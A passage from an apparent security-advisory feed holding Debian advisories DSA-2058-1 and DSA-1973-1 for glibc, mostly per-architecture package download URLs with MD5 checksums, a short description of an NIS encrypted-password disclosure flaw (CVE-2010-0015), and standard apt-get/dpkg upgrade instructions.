Size/MD5 checksum: 4257420 2069013636632e5af43c5bd2bbeb8569\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_mipsel.udeb\n Size/MD5 checksum: 1070864 9e1bf74bf2fa7887214587883b4668c5\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 172474 223733149d23b923fd2972e11e4a314b\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_mipsel.udeb\n Size/MD5 checksum: 8944 70c9e850f36487426610231334dbae70\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2466340 5917616c1f7c7084ce094afdf26c370a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2342756 2994dc7e36cdf7b37e338d466f0014a3\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 4870038 867410534719d991cae57e1b95c463ae\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_mipsel.udeb\n Size/MD5 checksum: 15348 47ab6c42738f79666fd7b0a76c4d740a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 1494574 b8b405bd03ff4d7228421397deeec896\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2074286 04860198fc9f5d87c36de120cf87a66f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2623718 c79f0343dbe4e2842dc98d06b9922d3d\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 9122594 b7147a76c5730a163795015c85d78501\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 2706880 4d365f59bc9e6828d94adc74dd559aeb\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_mipsel.deb\n Size/MD5 checksum: 5546712 e6e10890c2ec001562aa3de764dec691\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-ppc64_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 4495386 34e79dac6fa4f6c5507d77371df8c806\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_powerpc.udeb\n Size/MD5 checksum: 16840 c1472162d75104dbed2af920c077e145\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 5201168 e8af0591b517e2212c81bd4e28f6eee3\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_powerpc.udeb\n Size/MD5 checksum: 9412 b46e7c06fda73e99abc3b0251cfa0fae\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2756472 80a2a1d8343ac0d2d5a7d15597e5e1b1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-ppc64_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2410962 91d50628e6f807301b4100092ddd29b1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 1598006 b450a53fe6c4c8207bbeeb4789c4024c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 6329310 992d419ebebe8474714d4d9af894315e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_powerpc.udeb\n Size/MD5 checksum: 1224472 daf839353d109c04b467541e35541e24\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 175108 87b3d7604a7efe7da0987b8c73720d6c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2258436 a6413211eb3fddda694f1b274e31b692\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_powerpc.deb\n Size/MD5 checksum: 2805968 0819f0e9d5a13b9c122a038187ce349f\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-s390x_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2365558 82b0169430d68fbfde5580fc55af8539\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 5960804 0b2e1fc0f81a2cb1c0128c6e104f39c4\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_s390.udeb\n Size/MD5 checksum: 1218900 936f3961797f3ed1f2058accde977993\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2719690 b38b5bd34f66fc16780fe3b08dd38a2d\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_s390.udeb\n Size/MD5 checksum: 9036 43f683a165085bb78d8cff4875a30fbd\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_s390.udeb\n Size/MD5 checksum: 16196 4e520a214d39690c8fa75bcd1cba89f2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-s390x_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 4263974 757b89131b53bba9d31f634630432b00\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 5017052 c218f95d67d4c1d33b9fe5138822a1f5\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 1536062 1eceb2b77a00165200062277f7f0fc68\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2196462 f0abedaa97aadfc962e11a1888f14e46\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 2649836 e29ac3e192a8fa9d712eb3c8392e1cf6\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_s390.deb\n Size/MD5 checksum: 177020 687b7de35e5d43d61eba85dabc295cde\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparc64_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 4454834 ec068840b37666d1b7297ce4a0ca92e0\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 171076 c06ceb8fe02cc101a955baebcaa2c44f\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_sparc.udeb\n Size/MD5 checksum: 15044 4b185346f48fdb5ce70dcf52b0318c3b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_sparc.udeb\n Size/MD5 checksum: 1249952 1105fbdeb4a8a907a94358d0275cb010\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 1613194 3974152e0fed955e3368c205d5d62864\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2827474 936597c4403bf74c6be1a41cb6a580ff\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 5151582 b886dd55f655415a755197e070a0f18b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-sparc64_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2589968 6076836558c4d0370e643ad19bb9134c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 6797490 54a57b72675f41c4e7a36c3294e3b15c\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_sparc.udeb\n Size/MD5 checksum: 8324 a601cd0dfc7d2f7c8a35e83f8e70e643\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2304008 cfaf34cc9348baa6dc976c95033ee71d\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 2795854 3d674864ce1c25365e85892f63c6c102\n http://security.debian.org/pool/updates/main/g/glibc/libc6-sparcv9b_2.7-18lenny4_sparc.deb\n Size/MD5 checksum: 1762052 799715028d86fad7d041b93577bc6021\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2010-06-10T08:14:08", "published": "2010-06-10T08:14:08", "id": "DEBIAN:DSA-2058-1:F253E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00101.html", "title": "[SECURITY] [DSA 2058-1] New glibc packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:23:46", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0015"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1973-1 security@debian.org\nhttp://www.debian.org/security/ Aurelien Jarno\nJanuary 19, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : glibc, eglibc\nVulnerability : information disclosure\nProblem type : local\nDebian-specific: no\nCVE Id : CVE-2010-0015\nDebian Bug : 560333\n\nChristoph Pleger has discovered that the GNU C Library (aka glibc) and\nits derivatives add information from the passwd.adjunct.byname map to\nentries in the passwd map, which allows local users to obtain the\nencrypted passwords of NIS accounts by calling the getpwnam function.\n\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.3.6.ds1-13etch10 of the glibc package.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.7-18lenny2 of the glibc package.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 2.10.2-4 of the eglibc package.\n\n\nWe recommend that you upgrade your glibc or eglibc package.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ---------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.3.6.ds1-13etch10.dsc\n Size/MD5 checksum: 2194 3985b011708649359ca02ddb917e66b0\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.3.6.ds1-13etch10.diff.gz\n Size/MD5 checksum: 920950 fda680921e06d9448442c0e40a82b4fa\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.3.6.ds1.orig.tar.gz\n Size/MD5 checksum: 13307585 d5e6ffe51e49ab29d513e600fb87cf54\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/glibc/glibc-doc_2.3.6.ds1-13etch10_all.deb\n Size/MD5 checksum: 1480556 cf597752b310168ddbe626ee79671a33\n http://security.debian.org/pool/updates/main/g/glibc/locales_2.3.6.ds1-13etch10_all.deb\n Size/MD5 checksum: 4009500 c2a534de63b9f6ee1e76f65abc49feb8\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.3.6.ds1-13etch10_alpha.deb\n Size/MD5 checksum: 4159642 3b121212db334fed297fcf6dab3c3680\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_alpha.deb\n Size/MD5 checksum: 148272 d502d4869c0cf089c27648410d092213\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_alpha.deb\n Size/MD5 checksum: 6200126 a982e949961fe1481e0e990692dbb51b\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.3.6.ds1-13etch10_alpha.udeb\n Size/MD5 checksum: 1065688 57bcd95f817ac7452f19a78978abfcf0\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.3.6.ds1-13etch10_alpha.deb\n Size/MD5 checksum: 2001318 2b907dc3c2b8dd7561b2217f783f4c95\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.3.6.ds1-13etch10_alpha.deb\n Size/MD5 checksum: 1500858 3f54c6f851e41c13d3bff64e59bd0e1f\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.3.6.ds1-13etch10_alpha.deb\n Size/MD5 checksum: 5237256 a2cb93e373aaecda3ffb07d3f67e96c4\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_alpha.udeb\n Size/MD5 checksum: 10344 7c4cf8e44d6686cd2912a3f5ec64a8aa\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.3.6.ds1-13etch10_alpha.deb\n Size/MD5 checksum: 2516890 d8709d8f6fdb5f2168b08ad75c5fa509\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_alpha.udeb\n Size/MD5 checksum: 17140 5ea877d43c6e28a664fe065f1c814a60\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_amd64.udeb\n Size/MD5 checksum: 17204 b4cf2e844a92b8958c45e7fcbd79fdab\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 4182738 7aba28d40da5e8e0bfc8967e0bac9314\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 1578072 1363a2983499d4c5d83cb089811a9836\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 2297644 69157cc8bb0a67cb6ee2f39e6fd5dd79\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_amd64.udeb\n Size/MD5 checksum: 9576 c4639597ffbbf5131c00e0e94ab2d7bb\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 6170032 59554e22ee31ae0dd53a67e0c6df4061\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-i386_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 1586184 785fef40e67134584794e6a086395387\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 1405238 8e37a4f86895b494ec7a06e7e35f4442\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 2119318 8b0eab4f4648dc8d4898f51dc20ac8b1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_amd64.udeb\n Size/MD5 checksum: 1041568 2b32bea003088d26e118c4bbd200b2bd\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 146764 c79245ecc4da1fd97a487dfda0e0525c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i386_2.3.6.ds1-13etch10_amd64.deb\n Size/MD5 checksum: 3068822 194139a75531cde3daf20c0266941571\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_arm.udeb\n Size/MD5 checksum: 8518 19bd3a7f7d78a88d9e0144b228a39b8f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_arm.deb\n Size/MD5 checksum: 5220770 33969aa6fdfccbf0377f8abe0fe3bd07\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_arm.deb\n Size/MD5 checksum: 3943752 b09b5dacdb210af9176e5120fe64408f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_arm.deb\n Size/MD5 checksum: 1221324 a87fc95fdf31c88965817ba80bef426e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_arm.deb\n Size/MD5 checksum: 1501344 785b3b14831a908eff81d45773f71f3f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_arm.deb\n Size/MD5 checksum: 2016466 f59ea889e5abd0e216577c41f1643dc2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_arm.udeb\n Size/MD5 checksum: 931268 fd8b04e8467b57393c4fa879b2701cf9\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_arm.deb\n Size/MD5 checksum: 6192452 ca1e02a22223e1458864364647e4ce04\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_arm.udeb\n Size/MD5 checksum: 12992 91443531e77f48a582713703f6f72e6c\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_arm.deb\n Size/MD5 checksum: 141716 0159bab80a7ae05ac0c0ccfacabb37a7\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_hppa.udeb\n Size/MD5 checksum: 1053816 92606b4a88d9077635401e546d804700\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_hppa.deb\n Size/MD5 checksum: 2342264 b7d60a9297c5e3805df229dbb0a84f00\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_hppa.deb\n Size/MD5 checksum: 149642 33f9a874523a091c20b1a3a87040665e\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_hppa.udeb\n Size/MD5 checksum: 9690 e4295c97851f47c78a07526aa01508b3\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_hppa.deb\n Size/MD5 checksum: 1838362 f34d8ec6dcf0683251685dabaacd7fae\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_hppa.deb\n Size/MD5 checksum: 5048572 e68ad72e1ba1b31b2198ef71cbec30e7\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_hppa.udeb\n Size/MD5 checksum: 17466 fd893f59f98d1418c23f989d903deadd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_hppa.deb\n Size/MD5 checksum: 1409944 195ae4d239695076cbfc0996a88b98a0\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_hppa.deb\n Size/MD5 checksum: 4295920 2f3ae03b676b3ed39774053eda4e8ecc\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_hppa.deb\n Size/MD5 checksum: 6509860 9cf578571d21319595711e0a7cb79b45\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 1299202 b0c2a1a83001605a12cf16a81aa5f4d1\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_i386.udeb\n Size/MD5 checksum: 14338 b82a13ac006b2fe4ff2e6bfb14a34f2e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 1062722 154d4655738862ad9dcb6f83afdca89c\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 4853870 9c636d56285537139c55224aae4b9dd7\n http://security.debian.org/pool/updates/main/g/glibc/libc6-xen_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 1127394 3ec3741a5e94548a8e1b41aca9577f92\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i686_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 1122924 e4766f86319a4bf8f71bcb347e36aa2b\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 143136 5c66b596186c0cf52601b3321e8f6006\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 5449942 17e48c79d0fe791c64bd29937504622d\n http://security.debian.org/pool/updates/main/g/glibc/libc6-amd64_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 3438464 5368ebe3d13e91f36386dde5f1b2727f\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 6178590 28cdb341eb9e42a9fcfe5200d788050c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-amd64_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 2030244 9b8c8369cadbe5fbfc1f4acc4131194a\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_i386.udeb\n Size/MD5 checksum: 8536 8a2e335c439daa90dc0eac613350aa98\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_i386.deb\n Size/MD5 checksum: 2728566 51eb4925d6f0229e4176eb327da53cf1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_i386.udeb\n Size/MD5 checksum: 730916 f11e0ed828a22bc05b7a98dd5f4a9dae\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.3.6.ds1-13etch10_ia64.udeb\n Size/MD5 checksum: 1258168 94be3180bc0c2717cb3d6f8d8843bb0e\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.3.6.ds1-13etch10_ia64.deb\n Size/MD5 checksum: 4022146 c61ebac27a2c0079a7fe6b6c2b25dee3\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_ia64.udeb\n Size/MD5 checksum: 12576 582391b772e14373092837244e374e73\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.3.6.ds1-13etch10_ia64.deb\n Size/MD5 checksum: 2140854 834c1162eb0e238130300d46e16accb6\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.3.6.ds1-13etch10_ia64.deb\n Size/MD5 checksum: 6405448 799ae21bc72a07cdc0921fca4edbe446\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_ia64.deb\n Size/MD5 checksum: 165410 be53e71650ca09aa7eef465b7bd59210\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_ia64.udeb\n Size/MD5 checksum: 21028 0b880e73916a41284d809dbe21cf139f\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_ia64.deb\n Size/MD5 checksum: 6128622 a59c96c89c263755cb6c6fec1ccfc219\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.3.6.ds1-13etch10_ia64.deb\n Size/MD5 checksum: 5584726 a54b6c6dbb2a8468ccbcb214f471ed9a\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.3.6.ds1-13etch10_ia64.deb\n Size/MD5 checksum: 1638622 c0dc39ec7c845979ed819792af9e0745\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_mipsel.deb\n Size/MD5 checksum: 6121780 0429ea7a908709bebb6dcf1d3100178a\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_mipsel.deb\n Size/MD5 checksum: 3943222 eac023ecfb071c2ae42c15119a8d622a\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_mipsel.udeb\n Size/MD5 checksum: 8888 fd797ed35504a765910e713a5145b6c2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_mipsel.deb\n Size/MD5 checksum: 1770304 c0d6a55ecd9eab9815fbdc64dfb6b2da\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_mipsel.udeb\n Size/MD5 checksum: 14666 3b59893d657b9551323cdb6aa2d6bd90\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_mipsel.deb\n Size/MD5 checksum: 1399918 016c2369e7c28cbee32136a1aeb9a8a9\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_mipsel.udeb\n Size/MD5 checksum: 985476 7e16c25784b4b05011a2ab1960755123\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_mipsel.deb\n Size/MD5 checksum: 144404 35aec97c9996fccf72078f3584a27991\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_mipsel.deb\n Size/MD5 checksum: 2285748 a0a2d6d6003a16ac2dabb9d7e3bcc30d\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_mipsel.deb\n Size/MD5 checksum: 5387612 23c25ed0aa885a82a2cb61cab5c9be9e\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 1749474 f5185757750351eba95f496499aba27f\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.3.6.ds1-13etch10_powerpc.udeb\n Size/MD5 checksum: 993404 5f86afee2e3fa2998947c7afd4ddfdf8\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.3.6.ds1-13etch10_powerpc.udeb\n Size/MD5 checksum: 8944 ea51faf5dea0594761429fe2f4abe993\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 5496348 c1ff3595ac9388e243defd3e03fde3a8\n http://security.debian.org/pool/updates/main/g/glibc/libc6-ppc64_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 4115548 94291eb321d6fbec73fdd3d5cc419f85\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-ppc64_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 1591456 aa8eb821575b98840c905d844facd2b2\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 3269468 d4de7d42aa5bd021bbf820170b5397f1\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 6496852 f3f296fcd3b16c88d6ffdcce0bed9434\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 143148 451deeceec109d2cb4e0cda32011d8b5\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_powerpc.udeb\n Size/MD5 checksum: 15684 04c614964874c23007c6e52889856c73\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 1322128 bee883a8b157ebbc2a6f8f65ee3cd304\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_powerpc.deb\n Size/MD5 checksum: 6332834 ccea48d0b112314e0a23caf252ebd2e1\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 5407866 1869b33f1a533ce266ef6423d7e719a6\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 5515832 eb0b302e40a3f7e941800c683f31e9f4\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.3.6.ds1-13etch10_s390.udeb\n Size/MD5 checksum: 15044 40af80440f6bfe38f62e7f1b48b868e1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 1716866 dadaab99db6aacdbfc5b10a1f851c123\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 6511256 4a61d5773a84e2d1362961ee6efc28ab\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-s390x_2.3.6.ds1-13etch10_s390.deb\n Size/MD5 checksum: 1533632 